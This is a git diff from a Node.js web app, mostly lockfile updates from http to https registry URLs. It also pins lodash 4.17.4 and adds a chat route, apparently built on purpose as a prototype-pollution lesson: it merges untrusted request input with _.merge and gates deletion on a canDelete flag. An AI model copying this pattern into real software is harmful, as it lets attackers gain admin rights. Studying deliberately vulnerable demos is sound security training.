"sha512-Ra/OXQtuh0/enyl4ETZAfTaeksa6BXks5ZcjpSUNrjBr0DvrJKX+1fsKDPpT9TBXgHAFsa4510aNVgI8g/+SzA==", + "version": "1.16.1", + "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.16.1.tgz", + "integrity": "sha512-HXXqVUq7+pcKeLqqZj6mHFUMvXtOJt1uoUx09pFW6011inTMxqI8BA8PM95myrIyyKwdnzjdFjLiE6KBPVtJIg==", "requires": { "asn1": "~0.2.3", "assert-plus": "^1.0.0", @@ -4828,13 +4855,13 @@ "dependencies": { "graceful-fs": { "version": "1.2.3", - "resolved": "http://registry.npmjs.org/graceful-fs/-/graceful-fs-1.2.3.tgz", + "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-1.2.3.tgz", "integrity": "sha1-FaSAaldUfLLS2/J/QuiajDRRs2Q=", "optional": true }, "mime": { "version": "1.2.11", - "resolved": "http://registry.npmjs.org/mime/-/mime-1.2.11.tgz", + "resolved": "https://registry.npmjs.org/mime/-/mime-1.2.11.tgz", "integrity": "sha1-WCA+7Ybjpe8XrtK32evUfwpg3RA=" }, "negotiator": { @@ -4846,13 +4873,13 @@ }, "stack-utils": { "version": "0.4.0", - "resolved": "http://registry.npmjs.org/stack-utils/-/stack-utils-0.4.0.tgz", + "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-0.4.0.tgz", "integrity": "sha1-lAy4L8z6hOj/Lz/fKT/ngBa+zNE=" }, "stream-browserify": { - "version": "2.0.1", - "resolved": "http://registry.npmjs.org/stream-browserify/-/stream-browserify-2.0.1.tgz", - "integrity": "sha1-ZiZu5fm9uZQKTkUUyvtDu3Hlyds=", + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/stream-browserify/-/stream-browserify-2.0.2.tgz", + "integrity": "sha512-nX6hmklHs/gr2FuxYDltq8fJA1GDlxKQCz8O/IM4atRqBH8OORmBNgfvW5gG10GT/qQ9u0CzIvr2X5Pkt6ntqg==", "dev": true, "requires": { "inherits": "~2.0.1", @@ -4867,7 +4894,7 @@ }, "readable-stream": { "version": "2.3.6", - "resolved": "http://registry.npmjs.org/readable-stream/-/readable-stream-2.3.6.tgz", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.6.tgz", "integrity": "sha512-tQtKA9WIAhBF3+VLAseyMqZeBjW0AHJoxOtYqSUZNJxauErmLbVm2FW1y+J/YA9dUrAC39ITejlZWhVIwawkKw==", "dev": true, "requires": { @@ -4882,7 +4909,7 @@ }, "string_decoder": { "version": "1.1.1", - "resolved": "http://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "dev": true, "requires": { @@ -4898,7 +4925,7 @@ }, "stream-combiner": { "version": "0.0.4", - "resolved": "http://registry.npmjs.org/stream-combiner/-/stream-combiner-0.0.4.tgz", + "resolved": "https://registry.npmjs.org/stream-combiner/-/stream-combiner-0.0.4.tgz", "integrity": "sha1-TV5DPBhSYd3mI8o/RMWGvPXErRQ=", "requires": { "duplexer": "~0.1.1" @@ -4922,7 +4949,7 @@ }, "readable-stream": { "version": "2.3.6", - "resolved": "http://registry.npmjs.org/readable-stream/-/readable-stream-2.3.6.tgz", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.6.tgz", "integrity": "sha512-tQtKA9WIAhBF3+VLAseyMqZeBjW0AHJoxOtYqSUZNJxauErmLbVm2FW1y+J/YA9dUrAC39ITejlZWhVIwawkKw==", "dev": true, "requires": { @@ -4937,7 +4964,7 @@ }, "string_decoder": { "version": "1.1.1", - "resolved": "http://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "dev": true, "requires": { @@ -4967,7 +4994,7 @@ }, "readable-stream": { "version": "2.3.6", - "resolved": "http://registry.npmjs.org/readable-stream/-/readable-stream-2.3.6.tgz", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.6.tgz", "integrity": "sha512-tQtKA9WIAhBF3+VLAseyMqZeBjW0AHJoxOtYqSUZNJxauErmLbVm2FW1y+J/YA9dUrAC39ITejlZWhVIwawkKw==", "dev": true, "requires": { @@ -4982,7 +5009,7 @@ }, "string_decoder": { "version": "1.1.1", - "resolved": "http://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "dev": true, "requires": { @@ -4993,7 +5020,7 @@ }, "stream-splicer": { "version": "2.0.0", - "resolved": "http://registry.npmjs.org/stream-splicer/-/stream-splicer-2.0.0.tgz", + "resolved": "https://registry.npmjs.org/stream-splicer/-/stream-splicer-2.0.0.tgz", "integrity": "sha1-G2O+Q4oTPktnHMGTUZdgAXWRDYM=", "dev": true, "requires": { @@ -5009,7 +5036,7 @@ }, "readable-stream": { "version": "2.3.6", - "resolved": "http://registry.npmjs.org/readable-stream/-/readable-stream-2.3.6.tgz", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.6.tgz", "integrity": "sha512-tQtKA9WIAhBF3+VLAseyMqZeBjW0AHJoxOtYqSUZNJxauErmLbVm2FW1y+J/YA9dUrAC39ITejlZWhVIwawkKw==", "dev": true, "requires": { @@ -5024,7 +5051,7 @@ }, "string_decoder": { "version": "1.1.1", - "resolved": "http://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "dev": true, "requires": { @@ -5045,7 +5072,7 @@ }, "string_decoder": { "version": "0.10.31", - "resolved": "http://registry.npmjs.org/string_decoder/-/string_decoder-0.10.31.tgz", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-0.10.31.tgz", "integrity": "sha1-YuIDvEF2bGwoyfyEMB2rHFMQ+pQ=" }, "stringstream": { @@ -5055,7 +5082,7 @@ }, "strip-ansi": { "version": "3.0.1", - "resolved": "http://registry.npmjs.org/strip-ansi/-/strip-ansi-3.0.1.tgz", + "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-3.0.1.tgz", "integrity": "sha1-ajhfuIU9lS1f8F0Oiq+UJ43GPc8=", "requires": { "ansi-regex": "^2.0.0" @@ -5077,7 +5104,7 @@ }, "syntax-error": { "version": "1.4.0", - "resolved": "http://registry.npmjs.org/syntax-error/-/syntax-error-1.4.0.tgz", + "resolved": "https://registry.npmjs.org/syntax-error/-/syntax-error-1.4.0.tgz", "integrity": "sha512-YPPlu67mdnHGTup2A8ff7BC2Pjq0e0Yp/IyTFN03zWO0RcK07uLcbi7C2KpGR2FvWbaB0+bfE27a+sBKebSo7w==", "dev": true, "requires": { @@ -5086,7 +5113,7 @@ }, "tap": { "version": "5.8.0", - "resolved": "http://registry.npmjs.org/tap/-/tap-5.8.0.tgz", + "resolved": "https://registry.npmjs.org/tap/-/tap-5.8.0.tgz", "integrity": "sha1-y9cWSITLyFVm+ck3ooBrkR9Cmtw=", "requires": { "bluebird": "^3.3.1", @@ -5117,7 +5144,7 @@ }, "readable-stream": { "version": "2.3.6", - "resolved": "http://registry.npmjs.org/readable-stream/-/readable-stream-2.3.6.tgz", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.6.tgz", "integrity": "sha512-tQtKA9WIAhBF3+VLAseyMqZeBjW0AHJoxOtYqSUZNJxauErmLbVm2FW1y+J/YA9dUrAC39ITejlZWhVIwawkKw==", "requires": { "core-util-is": "~1.0.0", @@ -5131,7 +5158,7 @@ }, "string_decoder": { "version": "1.1.1", - "resolved": "http://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "requires": { "safe-buffer": "~5.1.0" @@ -5153,6 +5180,33 @@ "readable-stream": "^1.1.13", "tap-parser": "^1.0.4", "unicode-length": "^1.0.0" + }, + "dependencies": { + "debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "requires": { + "ms": "2.0.0" + } + }, + "ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha1-VgiurfwAvmwpAd9fmGF4jeDVl8g=" + }, + "readable-stream": { + "version": "1.1.14", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-1.1.14.tgz", + "integrity": "sha1-fPTFTvZI44EwhMY23SB54WbAgdk=", + "optional": true, + "requires": { + "core-util-is": "~1.0.0", + "inherits": "~2.0.1", + "isarray": "0.0.1", + "string_decoder": "~0.10.x" + } + } } }, "tap-parser": { @@ -5174,7 +5228,7 @@ }, "readable-stream": { "version": "2.3.6", - "resolved": "http://registry.npmjs.org/readable-stream/-/readable-stream-2.3.6.tgz", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.6.tgz", "integrity": "sha512-tQtKA9WIAhBF3+VLAseyMqZeBjW0AHJoxOtYqSUZNJxauErmLbVm2FW1y+J/YA9dUrAC39ITejlZWhVIwawkKw==", "optional": true, "requires": { @@ -5189,7 +5243,7 @@ }, "string_decoder": { "version": "1.1.1", - "resolved": "http://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "optional": true, "requires": { @@ -5200,7 +5254,7 @@ }, "tape": { "version": "2.3.0", - "resolved": "http://registry.npmjs.org/tape/-/tape-2.3.0.tgz", + "resolved": "https://registry.npmjs.org/tape/-/tape-2.3.0.tgz", "integrity": "sha1-Df7scJIn+8yRcKvn8EaWKycUMds=", "requires": { "deep-equal": "~0.1.0", @@ -5215,7 +5269,7 @@ }, "through": { "version": "2.3.8", - "resolved": "http://registry.npmjs.org/through/-/through-2.3.8.tgz", + "resolved": "https://registry.npmjs.org/through/-/through-2.3.8.tgz", "integrity": "sha1-DdTJ/6q8NXlgsbckEV1+Doai4fU=" }, "through2": { @@ -5236,7 +5290,7 @@ }, "readable-stream": { "version": "2.3.6", - "resolved": "http://registry.npmjs.org/readable-stream/-/readable-stream-2.3.6.tgz", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.6.tgz", "integrity": "sha512-tQtKA9WIAhBF3+VLAseyMqZeBjW0AHJoxOtYqSUZNJxauErmLbVm2FW1y+J/YA9dUrAC39ITejlZWhVIwawkKw==", "dev": true, "requires": { @@ -5251,7 +5305,7 @@ }, "string_decoder": { "version": "1.1.1", - "resolved": "http://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "dev": true, "requires": { @@ -5262,7 +5316,7 @@ }, "timers-browserify": { "version": "1.4.2", - "resolved": "http://registry.npmjs.org/timers-browserify/-/timers-browserify-1.4.2.tgz", + "resolved": "https://registry.npmjs.org/timers-browserify/-/timers-browserify-1.4.2.tgz", "integrity": "sha1-ycWLV1voQHN1y14kYtrO50NZ9B0=", "dev": true, "requires": { @@ -5281,11 +5335,12 @@ "dev": true }, "tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-3.0.1.tgz", + "integrity": "sha512-yQyJ0u4pZsv9D4clxO69OEjLWYw+jbgspjTue4lTQZLfV0c5l1VmK2y1JK8E9ahdpltPOaAThPcp5nKPUgSnsg==", "optional": true, "requires": { + "ip-regex": "^2.1.0", "psl": "^1.1.28", "punycode": "^2.1.1" } @@ -5328,21 +5383,22 @@ "dev": true }, "undeclared-identifiers": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/undeclared-identifiers/-/undeclared-identifiers-1.1.2.tgz", - "integrity": "sha512-13EaeocO4edF/3JKime9rD7oB6QI8llAGhgn5fKOPyfkJbRb6NFv9pYV6dFEmpa4uRjKeBqLZP8GpuzqHlKDMQ==", + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/undeclared-identifiers/-/undeclared-identifiers-1.1.3.tgz", + "integrity": "sha512-pJOW4nxjlmfwKApE4zvxLScM/njmwj/DiUBv7EabwE4O8kRUy+HIwxQtZLBPll/jx1LJyBcqNfB3/cpv9EZwOw==", "dev": true, "requires": { "acorn-node": "^1.3.0", + "dash-ast": "^1.0.0", "get-assigned-identifiers": "^1.2.0", "simple-concat": "^1.0.0", "xtend": "^4.0.1" } }, "underscore": { - "version": "1.8.3", - "resolved": "http://registry.npmjs.org/underscore/-/underscore-1.8.3.tgz", - "integrity": "sha1-Tz+1OxBuYJf8+ctBCfKl6b36UCI=" + "version": "1.9.1", + "resolved": "https://registry.npmjs.org/underscore/-/underscore-1.9.1.tgz", + "integrity": "sha512-5/4etnCkd9c8gwgowi5/om/mYO5ajCaOgdzj/oW+0eQV9WxKBDZw5+ycmKmeaTXjInS/W0BzpGLo2xR2aBwZdg==" }, "unicode-length": { "version": "1.0.3", @@ -5405,6 +5461,11 @@ "resolved": "https://registry.npmjs.org/utils-merge/-/utils-merge-1.0.0.tgz", "integrity": "sha1-ApT7kiu5N1FTVBxPcJYjHyh8ivg=" }, + "uuid": { + "version": "3.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.3.2.tgz", + "integrity": "sha512-yXJmeNaw3DnnKAOKJE51sL/ZaYfWJRl1pK9dr19YFCu0ObS231AB1/LbqTKRAQ5kw8A90rA6fr4riOUpTZvQZA==" + }, "vary": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/vary/-/vary-1.0.1.tgz", @@ -5429,7 +5490,7 @@ }, "vm-browserify": { "version": "0.0.4", - "resolved": "http://registry.npmjs.org/vm-browserify/-/vm-browserify-0.0.4.tgz", + "resolved": "https://registry.npmjs.org/vm-browserify/-/vm-browserify-0.0.4.tgz", "integrity": "sha1-XX6kW7755Kb/ZflUOOCofDV9WnM=", "dev": true, "requires": { diff --git a/package.json b/package.json index 328110365e0..a63eeb5e30e 100644 --- a/package.json +++ b/package.json @@ -32,6 +32,7 @@ "file-type": "^8.1.0", "humanize-ms": "1.0.1", "jquery": "^2.2.4", + "lodash": "4.17.4", "marked": "0.3.5", "method-override": "latest", "moment": "2.15.1", diff --git a/routes/index.js b/routes/index.js index ad8b37d0418..e01b125442f 100644 --- a/routes/index.js +++ b/routes/index.js @@ -15,6 +15,9 @@ var fileType = require('file-type'); var AdmZip = require('adm-zip'); var fs = require('fs'); +// prototype-pollution +var _ = require('lodash'); + exports.index = function (req, res, next) { Todo. find({}). @@ -225,3 +228,64 @@ exports.about_new = function (req, res, next) { device: req.query.device }); }; + +// Prototype Pollution + +/////////////////////////////////////////////////////////////////////////////// +// In order of simplicity we are not using any database. But you can write the +// same logic using MongoDB. +const users = [ + // You know password for the user. + {name: 'user', password: 'pwd'}, + // You don't know password for the admin. + {name: 'admin', password: Math.random().toString(32), canDelete: true}, +]; + +let messages = []; +let lastId = 1; + +function findUser(auth) { + return users.find((u) => + u.name === auth.name && + u.password === auth.password); +} +/////////////////////////////////////////////////////////////////////////////// + +exports.chat = { + get(req, res) { + res.send(messages); + }, + add(req, res) { + const user = findUser(req.body.auth || {}); + + if (!user) { + res.status(403).send({ok: false, error: 'Access denied'}); + return; + } + + const message = { + // Default message icon. Cen be overwritten by user. + icon: '👋', + }; + + _.merge(message, req.body.message, { + id: lastId++, + timestamp: Date.now(), + userName: user.name, + }); + + messages.push(message); + res.send({ok: true}); + }, + delete(req, res) { + const user = findUser(req.body.auth || {}); + + if (!user || !user.canDelete) { + res.status(403).send({ok: false, error: 'Access denied'}); + return; + } + + messages = messages.filter((m) => m.id !== req.body.messageId); + res.send({ok: true}); + } +};